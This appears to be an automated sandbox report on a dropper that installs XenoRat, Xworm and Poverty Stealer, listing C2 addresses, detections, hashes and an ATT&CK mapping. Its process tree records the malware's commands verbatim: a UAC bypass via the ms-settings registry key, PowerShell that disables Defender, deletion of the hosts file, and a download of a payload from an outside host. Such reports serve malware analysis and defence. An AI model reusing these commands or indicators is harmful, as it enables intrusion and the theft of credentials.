Overview

overview

10

Static

static

3

4363463463...63.exe

windows7-x64

10

4363463463...63.exe

windows10-2004-x64

10

New Text D...od.exe

windows7-x64

10

New Text D...od.exe

windows10-2004-x64

10

New Text D...od.exe

windows7-x64

10

New Text D...od.exe

windows10-2004-x64

10

Resubmissions

28-11-2024 02:19

241128-cr9sks1kht 10

27-11-2024 21:08

241127-zyzyaawqgn 10

27-11-2024 20:16

241127-y145caymbs 10

27-11-2024 20:13

241127-yzlxdavlen 10

27-11-2024 19:53

241127-yl61dsxpcs 10

27-11-2024 19:38

241127-ycrjcaxkfx 10

27-11-2024 19:03

241127-xqsswsslej 10

27-11-2024 19:03

241127-xqf44aslcr 3

27-11-2024 19:02

241127-xpxqfsslan 3

27-11-2024 18:32

241127-w6pkqs1mek 10

Analysis

  • max time kernel
    115s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 22:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score
10/10
povertystealerxenoratxwormdefense_evasiondiscoveryevasionexecutionpersistenceprivilege_escalationratspywarestealertrojan

Malware Config

Extracted

Family

xenorat

C2

beastsband.com

Mutex

x3n0

Attributes
  • delay

    5000

  • install_path

    nothingset

  • port

    4444

  • startup_name

    nothingset

Extracted

Family

xworm

Version

5.0

C2

68.178.207.33:7000

Mutex

sSM7p4MT4JctLnRS

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Poverty Stealer Payload 5 IoCs
  • Detect XenoRat Payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

    stealerpovertystealer
  • Povertystealer family
    povertystealer
  • XenorRat

    XenorRat is a remote access trojan written in C#.

    trojanratxenorat
  • Xenorat family
    xenorat
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

    execution
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 34 IoCs
  • Identifies Wine through registry keys 2 TTPs 1 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 33 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4824
    • C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
      "C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:4628
    • C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2748
      • C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
        "C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4944
    • C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe
      "C:\Users\Admin\AppData\Local\Temp\a\wKQeiIr.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1992
    • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
      "C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\system32\cmd.exe
        /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2192
        • C:\Windows\system32\reg.exe
          reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
          4⤵
            PID:1436
        • C:\Windows\system32\cmd.exe
          /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6713.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:748
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\6713.vbs" /f
            4⤵
            • Modifies registry class
            PID:2324
          • C:\Windows\system32\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
            4⤵
            • Modifies registry class
            PID:64
        • C:\Windows\system32\cmd.exe
          /c start /B ComputerDefaults.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4992
          • C:\Windows\system32\ComputerDefaults.exe
            ComputerDefaults.exe
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2572
            • C:\Windows\system32\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\6713.vbs
              5⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4048
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                6⤵
                  PID:2776
          • C:\Windows\system32\cmd.exe
            /c del /f C:\Users\Admin\AppData\Local\Temp\6713.vbs
            3⤵
              PID:924
            • C:\Windows\system32\cmd.exe
              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3008
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                • Modifies registry class
                PID:3564
            • C:\Windows\system32\cmd.exe
              /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1164
              • C:\Windows\system32\reg.exe
                reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                4⤵
                  PID:2340
              • C:\Windows\system32\cmd.exe
                /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4637.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2584
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\4637.vbs" /f
                  4⤵
                  • Modifies registry class
                  PID:2960
                • C:\Windows\system32\reg.exe
                  reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                  4⤵
                  • Modifies registry class
                  PID:4828
              • C:\Windows\system32\cmd.exe
                /c start /B ComputerDefaults.exe
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1272
                • C:\Windows\system32\ComputerDefaults.exe
                  ComputerDefaults.exe
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4948
                  • C:\Windows\system32\wscript.exe
                    "wscript.exe" C:\Users\Admin\AppData\Local\Temp\4637.vbs
                    5⤵
                    • Checks computer location settings
                    • Suspicious use of WriteProcessMemory
                    PID:2820
                    • C:\Windows\System32\netsh.exe
                      "C:\Windows\System32\netsh.exe" interface ip set dns "Wi-Fi" dhcp
                      6⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:2176
              • C:\Windows\system32\cmd.exe
                /c del /f C:\Users\Admin\AppData\Local\Temp\4637.vbs
                3⤵
                  PID:3772
                • C:\Windows\system32\cmd.exe
                  /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                  3⤵
                    PID:5020
                    • C:\Windows\system32\reg.exe
                      reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                      4⤵
                      • Modifies registry class
                      PID:4536
                  • C:\Windows\system32\cmd.exe
                    /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                    3⤵
                      PID:4588
                      • C:\Windows\system32\reg.exe
                        reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                        4⤵
                          PID:1236
                      • C:\Windows\system32\cmd.exe
                        /c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7871.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                        3⤵
                          PID:4496
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\7871.vbs" /f
                            4⤵
                            • Modifies registry class
                            PID:2672
                          • C:\Windows\system32\reg.exe
                            reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f
                            4⤵
                            • Modifies registry class
                            PID:3708
                        • C:\Windows\system32\cmd.exe
                          /c start /B ComputerDefaults.exe
                          3⤵
                            PID:3012
                            • C:\Windows\system32\ComputerDefaults.exe
                              ComputerDefaults.exe
                              4⤵
                                PID:3500
                                • C:\Windows\system32\wscript.exe
                                  "wscript.exe" C:\Users\Admin\AppData\Local\Temp\7871.vbs
                                  5⤵
                                  • Checks computer location settings
                                  PID:2572
                                  • C:\Windows\System32\netsh.exe
                                    "C:\Windows\System32\netsh.exe" interface ip set dns "Ethernet" dhcp
                                    6⤵
                                    • Event Triggered Execution: Netsh Helper DLL
                                    PID:3548
                            • C:\Windows\system32\cmd.exe
                              /c del /f C:\Users\Admin\AppData\Local\Temp\7871.vbs
                              3⤵
                                PID:3172
                              • C:\Windows\system32\cmd.exe
                                /c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                3⤵
                                  PID:1644
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f
                                    4⤵
                                    • Modifies registry class
                                    PID:3516
                              • C:\Users\Admin\AppData\Local\Temp\a\filer.exe
                                "C:\Users\Admin\AppData\Local\Temp\a\filer.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                • Suspicious use of SetWindowsHookEx
                                PID:3588
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\a\filer.exe
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3260
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1916
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic os get Caption
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2572
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic cpu get Name
                                  3⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3240
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic path win32_VideoController get name
                                  3⤵
                                  • Detects videocard installed
                                  PID:3460
                                • C:\Windows\System32\Wbem\wmic.exe
                                  wmic csproduct get UUID
                                  3⤵
                                    PID:1432
                                • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of FindShellTrayWindow
                                  • Suspicious use of SendNotifyMessage
                                  PID:4904
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -Command "Invoke-WebRequest -Uri "https://ratsinthehole.com/vvvv/yVdlbFlx" -OutFile "C:\Users\Public\Guard.exe""
                                    3⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:116
                                • C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:740
                                • C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1560
                                • C:\Users\Admin\AppData\Local\Temp\a\333.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\333.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:2128
                                • C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:4208
                                • C:\Users\Admin\AppData\Local\Temp\a\test12.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test12.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2000
                                • C:\Users\Admin\AppData\Local\Temp\a\test6.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test6.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4076
                                • C:\Users\Admin\AppData\Local\Temp\a\test14.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test14.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3628
                                • C:\Users\Admin\AppData\Local\Temp\a\pantest.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\pantest.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4616
                                • C:\Users\Admin\AppData\Local\Temp\a\test9.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test9.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4336
                                • C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test10-29.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3708
                                • C:\Users\Admin\AppData\Local\Temp\a\test19.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test19.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2144
                                • C:\Users\Admin\AppData\Local\Temp\a\test10.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test10.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:4768
                                • C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again4.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2656
                                • C:\Users\Admin\AppData\Local\Temp\a\test23.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test23.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3156
                                • C:\Users\Admin\AppData\Local\Temp\a\test5.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test5.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2204
                                • C:\Users\Admin\AppData\Local\Temp\a\test11.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test11.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3756
                                • C:\Users\Admin\AppData\Local\Temp\a\test20.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test20.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2284
                                • C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again3.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:940
                                • C:\Users\Admin\AppData\Local\Temp\a\test16.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test16.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3944
                                • C:\Users\Admin\AppData\Local\Temp\a\test13.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test13.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1684
                                • C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test_again2.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3260
                                • C:\Users\Admin\AppData\Local\Temp\a\test15.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test15.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2368
                                • C:\Users\Admin\AppData\Local\Temp\a\test18.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test18.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3104
                                • C:\Users\Admin\AppData\Local\Temp\a\test21.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test21.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2980
                                • C:\Users\Admin\AppData\Local\Temp\a\test22.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test22.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1520
                                • C:\Users\Admin\AppData\Local\Temp\a\test8.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test8.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:1008
                                • C:\Users\Admin\AppData\Local\Temp\a\test7.exe
                                  "C:\Users\Admin\AppData\Local\Temp\a\test7.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:3456

                              Network

                              MITRE ATT&CK Enterprise v15

                              Reconnaissance

                              Resource Development

                              Initial Access

                              Execution

                              Command and Scripting Interpreter

                              1
                              T1059

                              PowerShell

                              1
                              T1059.001

                              Persistence

                              Event Triggered Execution

                              1
                              T1546

                              Netsh Helper DLL

                              1
                              T1546.007

                              Privilege Escalation

                              Event Triggered Execution

                              1
                              T1546

                              Netsh Helper DLL

                              1
                              T1546.007

                              Defense Evasion

                              Indicator Removal

                              1
                              T1070

                              File Deletion

                              1
                              T1070.004

                              Virtualization/Sandbox Evasion

                              2
                              T1497

                              Credential Access

                              Credentials from Password Stores

                              1
                              T1555

                              Credentials from Web Browsers

                              1
                              T1555.003

                              Unsecured Credentials

                              1
                              T1552

                              Credentials In Files

                              1
                              T1552.001

                              Discovery

                              Browser Information Discovery

                              1
                              T1217

                              Query Registry

                              4
                              T1012

                              System Information Discovery

                              4
                              T1082

                              System Location Discovery

                              1
                              T1614

                              System Language Discovery

                              1
                              T1614.001

                              Virtualization/Sandbox Evasion

                              2
                              T1497

                              Lateral Movement

                              Collection

                              Data from Local System

                              1
                              T1005

                              Command and Control

                              Exfiltration

                              Impact

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                Filesize

                                2KB

                                MD5

                                d85ba6ff808d9e5444a4b369f5bc2730

                                SHA1

                                31aa9d96590fff6981b315e0b391b575e4c0804a

                                SHA256

                                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                SHA512

                                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                944B

                                MD5

                                6d42b6da621e8df5674e26b799c8e2aa

                                SHA1

                                ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                SHA256

                                5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                SHA512

                                53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Filesize

                                944B

                                MD5

                                9e22f5f8482f42818bd01bc5d34cc09c

                                SHA1

                                78cee6c628479315068d433f2f64026cda923fab

                                SHA256

                                e9bac58ebf7ebd18168720741c76ac73c8050282344582803c1f6e328cd16fd8

                                SHA512

                                a7f25d548622078deb06974248064811ef19631005fe2ccb6955c164f08fab7762b0295d6fd1807eba961af7469eeafdaf5acca4737c11727b4654348793e913

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\4637.vbs
                                Filesize

                                114B

                                MD5

                                34b33b5a437e20d03d79b62a797dfe99

                                SHA1

                                9b57b598a7e9d66157a05a44bc7c097bf5486e6c

                                SHA256

                                f920f526773c0565072fcfd250319c9dd53b9197d448b9d29307598e0fa004e1

                                SHA512

                                757be8161af2eb4af36772e2e0d912e0967540cb42ef6ef8cd85f28edb478756c99d9e7a6fef04b16e6bf63a3dc9ddb9c2adf490e8d9ae2ca0e3e9b76ef6fa6c

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\6713.vbs
                                Filesize

                                125B

                                MD5

                                8b4ed5c47fdddbeba260ef11cfca88c6

                                SHA1

                                868f11f8ed78ebe871f9da182d053f349834b017

                                SHA256

                                170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5

                                SHA512

                                87e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\7871.vbs
                                Filesize

                                117B

                                MD5

                                bb8cfb89bce8af7384447115a115fb23

                                SHA1

                                6a0e728f4953128db9db52474ae5608ecee9c9c3

                                SHA256

                                d812291a41eddd5eac04972e66feffc44c1ee2c249d708bb282144823a6e8485

                                SHA512

                                d69901ba3cebd1fe8ed8e3d613e16a6cfbead827a9493a7edd8c62fb2915a550450ff4f47f00a8c66880ea10cd4029bceac4518d1951c19fb7ad9d7505007553

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kicr4ce3.prz.ps1
                                Filesize

                                60B

                                MD5

                                d17fe0a3f47be24a6453e9ef58c94641

                                SHA1

                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                SHA256

                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                SHA512

                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\AmLzNi.exe
                                Filesize

                                1.0MB

                                MD5

                                73507ed37d9fa2b2468f2a7077d6c682

                                SHA1

                                f4704970cedac462951aaf7cd11060885764fe21

                                SHA256

                                c33e3295dcb32888d000a2998628e82fd5b6d5ee3d7205ea246ac6357aa2bea6

                                SHA512

                                3a1031ce2daf62a054f41d226e9c9a0144ce746130db68737aaaa7930b148cbfbb99476c05504d6ebd4911f4e567ec1399005be7e64583caa636d7d94f5cd369

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\Tq4a1Bz.exe
                                Filesize

                                185KB

                                MD5

                                9c433a245d7737ca7fa17490e460f14e

                                SHA1

                                31e6388f4e45a97a97ac0f34c26a9858ef8dcdb9

                                SHA256

                                0b6604d2e6086f7322c634ab925bdc381fe720a2a12f254e5b63b42f89b680f7

                                SHA512

                                edaf8ff778db40dfcacd7c8cb5cef598dc7c13ebfb6b4f8e828c0697b24115f637ac510c945d31b1c4873d39fca7d8be7b03ba6dc64e665def6bf2d058a00c95

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\UqhRb9F.exe
                                Filesize

                                1.7MB

                                MD5

                                cfbd38c30f1100b5213c9dd008b6e883

                                SHA1

                                03da6d72c9d92bea2b2e5c4a8538f0a3628fbe73

                                SHA256

                                25350f356b356c9ab48ebfcca67cad970d1a213f8716a1d006d339a38f0f7cc5

                                SHA512

                                a7d3bce28d0443dbe671394bd6c720f0fba28cf18ee0a5c3bfe547c3ffaebb9431ebe40749de1eb460b03696a401c167d76de99e9769e33ca62a3bf8302a5b04

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\VBVEd6f.exe
                                Filesize

                                409KB

                                MD5

                                4ea576c1e8f58201fd4219a86665eaa9

                                SHA1

                                efaf3759b04ee0216254cf07095d52b110c7361f

                                SHA256

                                d94206d9509cc47cae22c94d32658b31cf65c37b1b15ce035ffaa5ce5872ad2f

                                SHA512

                                0c7462bc590d06f0ead37246f189d4d56e1d62ff73f67bf7e2ce9c653d8c56812a5f1306fb504168f7e33b87485c3465ea921a36f1ba5b458d7763e45c649494

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\XClient.exe
                                Filesize

                                32KB

                                MD5

                                ce69d13cb31832ebad71933900d35458

                                SHA1

                                e9cadfcd08d79a2624d4a5320187ae84cf6a0148

                                SHA256

                                9effe406fd302590314a9211fda92126ea6a7721d294c93fdf755b4cdfbd0bcf

                                SHA512

                                7993e79a9aeee679c9342d36fcb7624f1e7616db59eff10ff50d00e84bbbc5d9d7c154601f8a94bed7f25888f43f6f1922b87af31a582221e9022e6a8c3b1409

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\Xworm%20V5.6.exe
                                Filesize

                                14.9MB

                                MD5

                                3273f078f87cebc3b06e9202e3902b5c

                                SHA1

                                03b1971e04c8e67a32f38446bd8bfac41825f9cc

                                SHA256

                                4b6caa8467cf7ca3d7a3d3b2ac70e48510b7c4570e4810f3305aca1ef6cdf85c

                                SHA512

                                2a0bc7bf3ffd2f2e027e0feffb803f76dd11da48335e1b66a3c1927410e0a82c6ce212901c2ace9eca5bcce51eee49a12dc4619fc31711f0770e2d55ab7730f9

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\fHR9z2C.exe
                                Filesize

                                254KB

                                MD5

                                892d97db961fa0d6481aa27c21e86a69

                                SHA1

                                1f5b0f6c77f5f7815421444acf2bdd456da67403

                                SHA256

                                c4b11faff0239bc2d192ff6e90adec2684124336e37c617c4118e7e3bc338719

                                SHA512

                                7fe31101f027f2352dea44b3ba4280e75a4359b6a822d813f9c50c0d6ef319b7c345280786c1bc794b45fbd4fa87939a79cc15b82fc7959ccce1b732f33ba241

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Temp\a\filer.exe
                                Filesize

